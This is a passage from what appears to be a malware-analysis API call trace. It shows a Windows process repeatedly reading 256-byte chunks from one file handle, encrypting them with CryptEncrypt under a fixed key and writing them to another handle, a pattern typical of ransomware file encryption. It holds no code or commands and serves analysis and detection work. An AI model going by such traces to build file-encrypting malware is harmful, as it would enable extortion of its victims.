pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.256] GetLastError () returned 0x0 [0149.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.256] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.257] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.257] GetLastError () returned 0x0 [0149.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.257] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.257] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.257] GetLastError () returned 0x0 [0149.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.257] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.257] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.257] GetLastError () returned 0x0 [0149.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.257] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.257] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.257] GetLastError () returned 0x0 [0149.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.257] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.257] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.257] GetLastError () returned 0x0 [0149.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.257] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.257] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.257] GetLastError () returned 0x0 [0149.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.257] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.257] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.258] GetLastError () returned 0x0 [0149.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.258] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.258] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.258] GetLastError () returned 0x0 [0149.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.258] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.258] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.258] GetLastError () returned 0x0 [0149.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.258] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.258] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.258] GetLastError () returned 0x0 [0149.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.258] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.258] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.258] GetLastError () returned 0x0 [0149.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.258] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.258] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.258] GetLastError () returned 0x0 [0149.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.259] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.259] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.259] GetLastError () returned 0x0 [0149.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.259] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.259] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.259] GetLastError () returned 0x0 [0149.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.259] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.259] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.259] GetLastError () returned 0x0 [0149.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.259] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.259] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.259] GetLastError () returned 0x0 [0149.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.259] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.259] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.259] GetLastError () returned 0x0 [0149.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.259] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.259] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.259] GetLastError () returned 0x0 [0149.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.259] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.260] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.260] GetLastError () returned 0x0 [0149.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.260] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.260] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.260] GetLastError () returned 0x0 [0149.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.260] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.260] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.260] GetLastError () returned 0x0 [0149.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.260] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.260] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.260] GetLastError () returned 0x0 [0149.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.260] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.260] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.260] GetLastError () returned 0x0 [0149.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.260] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.260] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.260] GetLastError () returned 0x0 [0149.260] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.260] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.260] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.260] GetLastError () returned 0x0 [0149.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.261] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.261] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.261] GetLastError () returned 0x0 [0149.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.261] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.261] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.261] GetLastError () returned 0x0 [0149.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.261] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.261] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.261] GetLastError () returned 0x0 [0149.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.261] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.261] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.261] GetLastError () returned 0x0 [0149.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.261] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.261] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.261] GetLastError () returned 0x0 [0149.261] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.261] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.261] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.262] GetLastError () returned 0x0 [0149.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.262] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.262] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: 